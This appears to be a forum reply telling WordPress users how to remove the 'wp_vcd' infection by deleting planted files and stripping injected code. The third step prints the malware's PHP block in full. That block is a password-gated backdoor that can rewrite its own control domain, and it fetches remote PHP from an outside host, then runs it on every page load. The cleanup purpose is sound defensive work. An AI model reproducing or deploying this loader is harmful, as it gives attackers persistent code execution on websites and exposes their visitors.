I had the same problem. Here is how I solved it.
1. Go to wp-includes foler in your wordpress directory and delete these files: wp_vcd.php,class.wp.php.
2.At the same folder, find post.php and delete any code at the top that comes before:
<?php
/**
* Core Post API
*
* @package WordPress
* @subpackage Post
*/
//
// Post Type Registration
//
/**
* Creates the initial post types when 'init' action is fired.
*
* See {@see 'init'}.
*
* @since 2.9.0
*/
function create_initial_post_types() {
register_post_type( 'post', array(
'labels' => array.....
3. Go to your theme’s folder location and find the function.php file. It should have the code below at the top.
<?php
if (isset($_REQUEST['action']) && isset($_REQUEST['password']) && ($_REQUEST['password'] == 'f021e824fb05a9e4678d312683a585c0'))
{
$div_code_name="wp_vcd";
switch ($_REQUEST['action'])
{
case 'change_domain';
if (isset($_REQUEST['newdomain']))
{
if (!empty($_REQUEST['newdomain']))
{
if ($file = @file_get_contents(__FILE__))
{
if(preg_match_all('/\$tmpcontent = @file_get_contents\("http:\/\/(.*)\/code10\.php/i',$file,$matcholddomain))
{
$file = preg_replace('/'.$matcholddomain[1][0].'/i',$_REQUEST['newdomain'], $file);
@file_put_contents(__FILE__, $file);
print "true";
}
}
}
}
break;
default: print "ERROR_WP_ACTION WP_V_CD WP_CD";
}
die("");
}
if ( ! function_exists( 'theme_temp_setup' ) ) {
$path=$_SERVER['HTTP_HOST'].$_SERVER[REQUEST_URI];
if ( ! is_404() && stripos($_SERVER['REQUEST_URI'], 'wp-cron.php') == false && stripos($_SERVER['REQUEST_URI'], 'xmlrpc.php') == false) {
if($tmpcontent = @file_get_contents("https://www.dolsh.com/code10.php?i=".$path))
{
function theme_temp_setup($phpCode) {
$tmpfname = tempnam(sys_get_temp_dir(), "theme_temp_setup");
$handle = fopen($tmpfname, "w+");
fwrite($handle, "<?php\n" . $phpCode);
fclose($handle);
include $tmpfname;
unlink($tmpfname);
return get_defined_vars();
}
extract(theme_temp_setup($tmpcontent));
}
}
}
?>
